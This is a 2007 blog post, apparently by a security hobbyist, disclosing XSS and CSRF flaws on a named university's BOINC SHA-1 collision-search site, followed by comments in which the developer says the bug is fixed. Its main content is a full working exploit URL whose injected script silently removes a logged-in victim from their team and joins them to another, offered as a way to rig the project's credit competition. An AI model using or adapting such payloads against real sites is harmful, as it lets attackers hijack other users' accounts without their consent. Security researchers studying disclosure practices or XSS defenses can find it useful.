Thursday, August 23, 2007

SHA-1 Collision Search Graz XSS and CSRF

A couple of days ago, at elhacker.net, they showed a project, for finding SHA-1 collisions.
After I registered, I found out that there was a "competition" of teams, for winning credits.
http://boinc.iaik.tugraz.at/sha1_coll_search/top_teams.php

So, after checking out how it worked, I found a CSRF, and XSS at the team search engine.

So, I made a simple exploit, that will change your team to.. BOINC Confederation.

The XSS vuln, is here:
http://boinc.iaik.tugraz.at/team_lookup.php?team_name=XSS&search=Search

The CSRF vuln is in all forms..

The exploit (for firefox) is:
http://boinc.iaik.tugraz.at/team_lookup.php?team_name=%3Cscript%3Ewith(new%20XMLHttpRequest()){open(%22GET%22,%22http://boinc.iaik.tugraz.at/team_quit_form.php%22,false);send(null);x=responseText.match(/id%20value=([0-9]*)/)[1];open(%22POST%22,%22http://boinc.iaik.tugraz.at/team_quit_action.php%22,false);setRequestHeader(%22Content-Type%22,%22application/x-www-form-urlencoded%22);send(%22id=%22%2Bx);open(%22POST%22,%22http://boinc.iaik.tugraz.at/team_join_action.php%22,false);setRequestHeader(%22Content-Type%22,%22application/x-www-form-urlencoded%22);send(%22teamid=1%22);}%3C/script%3E&search=Search

Pretty simple :P

So, by "stealing" a user of an important team.. you can make your team win, the list of the top users is here:
http://boinc.iaik.tugraz.at/top_users.php

Greetz!!

--EDIT--
The bug has been fixed :) is good to see that someone actually reads my blog xD

4 comments:

  1. sirdarkcat is evil :)

    Everybody should redirect your IPs to a monitored honeybox for 3-4 days, whenever new content is released...

    ReplyDelete
  2. I think they do, this bug has been patched.. :o!
    My logs (Google Analytics) show's that some one reported this post though GMail, to the owners of the project..
    Pff, maybe if I use Responsible Disclosure next time, they will give some extra credits haha

    ReplyDelete
  3. Hi, I'm the official developer of the system. I have subscribed to Google Alerts, and one of them brought me to your blog. Since Google sends alerts to GMail, there was no middleman involved (well, kind of).

    Thanks for finding the bug, but next time it would be better if it wasn't reported publicly :)

    ReplyDelete
  4. ok rytis, sorry for the full disclosure, but since it wasn't so dangerous I disclose it this way, some new XSS will reported to you privately :)
    Greetz!!

    ReplyDelete